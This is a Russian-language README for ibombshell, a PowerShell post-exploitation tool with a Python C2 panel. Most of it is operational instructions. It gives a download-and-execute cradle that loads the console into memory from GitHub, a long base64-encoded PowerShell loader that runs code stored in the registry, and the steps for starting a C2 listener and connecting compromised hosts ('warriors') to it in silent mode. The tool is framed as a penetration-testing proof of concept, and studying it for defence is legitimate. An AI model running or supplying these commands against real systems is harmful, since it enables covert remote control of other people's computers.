
Инструмент для развертывания пост-эксплуатационного промпта в любое время
,--.!, _ ____ __ _____ __ ____
__/ -*- (_) __ )____ ____ ___ / /_ / ___// /_ ___ / / /
,d08b. '|` / / __ / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
0088MM / / /_/ / /_/ / / / / / / /_/ /__/ / / / / __/ / /
`9MMP' /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/
[+] Starting the console...
[*] Console ready!
ibombshell — это инструмент, написанный на PowerShell, который позволяет в любой момент получить командную строку с функциями пост-эксплуатации (а в некоторых случаях и эксплуатации). Это оболочка, которая загружается напрямую в память, предоставляя доступ к большому количеству функций пентестинга. Эти функции могут быть загружены прямо в память в виде функции PowerShell. Такой способ выполнения известен как everywhere.
Кроме того, ibombshell предоставляет второй режим выполнения — Silently, позволяющий пентестеру запустить экземпляр ibombshell (называемый warrior). Скомпрометированный компьютер подключается к панели C2 по HTTP. Таким образом, появляется возможность управлять warrior и загружать функции в память, помогающие пентестеру. Это происходит на этапе пост-эксплуатации.
Для запуска ibombshell everywhere требуется PowerShell версии 3.0 или выше. Для операционных систем, отличных от Windows, вы можете узнать больше об этом в PowerShell GitHub — PowerShell для каждой системы!.
Для запуска ibombshell silently mode необходим Python 3.6 и некоторые библиотеки Python. Установить их можно с помощью:
cd ibombshell\ c2/
pip install -r requirements.txt
Примечание: ibombshell C2 работает на python 3.X. Убедитесь, что вы используете pip, соответствующий этой версии.
ibombshell имеет два режима выполнения:
Чтобы загрузить ibombshell, просто выполните в PowerShell:
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)
Теперь вы можете запустить загруженную консоль ibombshell, выполнив:
console
Если вам нужно использовать ibombshell в изолированных средах, сначала подготовьте свой компьютер в сетевой среде. Загрузите все необходимые функции и используйте savefunctions, чтобы сохранить их в реестре Windows.
Теперь вы можете использовать этот base64-код для получения ibombshell:
powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"
Эта версия позволяет запускать консоль ibombshell и управлять ею удалённо через панель C2, написанную на Python. Чтобы запустить эту версию, сначала запустите процесс консоли в PowerShell:
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)
В каталоге ibombshell C2 подготовьте C2:
python3 ibombshell.py
И создайте слушатель, к которому будут подключаться warrior:
iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run
Порт слушателя по умолчанию — 8080. Наконец, вы можете запустить консоль в режиме silently на хосте для удалённого управления:
console -Silently -uriConsole http://[ip or domain]:[port]
Базовая работа панели управления ibombshell выглядит следующим образом:
ibombshell C2
| |
| newibombshell |
+--------------------->| --+ register
| |<--+ from IP
| get functions |
| and instructions |
+--------------------->|
| |
| send functions |
| and instructions |
execute +-- |<---------------------+
+-->| |
| results |
+--------------------->|
| |
Мы создали Docker-контейнер со всем необходимым для работы. Выполните эту команду из расположения Dockerfile.
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell
Несколько примеров видео...
Этот проект распространяется под лицензией GNU General Public License — подробнее см. в файле LICENSE.
ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ», БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ, ЯВНЫХ ИЛИ ПОДРАЗУМЕВАЕМЫХ, ВКЛЮЧАЯ, НО НЕ ОГРАНИЧИВАЯСЬ, ГАРАНТИЯМИ ТОВАРНОЙ ПРИГОДНОСТИ, ПРИГОДНОСТИ ДЛЯ ОПРЕДЕЛЁННОЙ ЦЕЛИ И НЕНАРУШЕНИЯ ПРАВ. НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ АВТОРЫ ИЛИ ПРАВООБЛАДАТЕЛИ НЕ НЕСУТ ОТВЕТСТВЕННОСТИ ПО КАКИМ-ЛИБО ИСКАМ, УБЫТКАМ ИЛИ ИНЫМ ТРЕБОВАНИЯМ, ВОЗНИКШИМ В РЕЗУЛЬТАТЕ ДОГОВОРА, ДЕЛИКТА ИЛИ ИНЫМ ОБРАЗОМ, СВЯЗАННЫМ С ПРОГРАММНЫМ ОБЕСПЕЧЕНИЕМ ИЛИ ЕГО ИСПОЛЬЗОВАНИЕМ ИЛИ ИНЫМИ ДЕЙСТВИЯМИ С НИМ. ВНОСЯ ВКЛАД В РЕПОЗИТОРИЙ, СОДЕРЖАЩИЙ УВЕДОМЛЕНИЕ О ЛИЦЕНЗИИ, ВЫ ПРЕДОСТАВЛЯЕТЕ СВОЙ ВКЛАД НА ТЕХ ЖЕ УСЛОВИЯХ И ПОДТВЕРЖДАЕТЕ, ЧТО ИМЕЕТЕ ПРАВО ПРЕДОСТАВЛЯТЬ ЕГО НА ТАКИХ УСЛОВИЯХ. ЕСЛИ У ВАС ЕСТЬ ОТДЕЛЬНОЕ СОГЛАШЕНИЕ О ЛИЦЕНЗИРОВАНИИ ВАШИХ ВКЛАДОВ НА ДРУГИХ УСЛОВИЯХ, ТАКОЕ КАК СОГЛАШЕНИЕ О ЛИЦЕНЗИИ ВКЛАДЧИКА, ТО ЭТО СОГЛАШЕНИЕ ИМЕЕТ ПРИОРИТЕТ.
Данное программное обеспечение не имеет процесса контроля качества. Это Proof of Concept.
Если у вас возникли проблемы, вы можете связаться: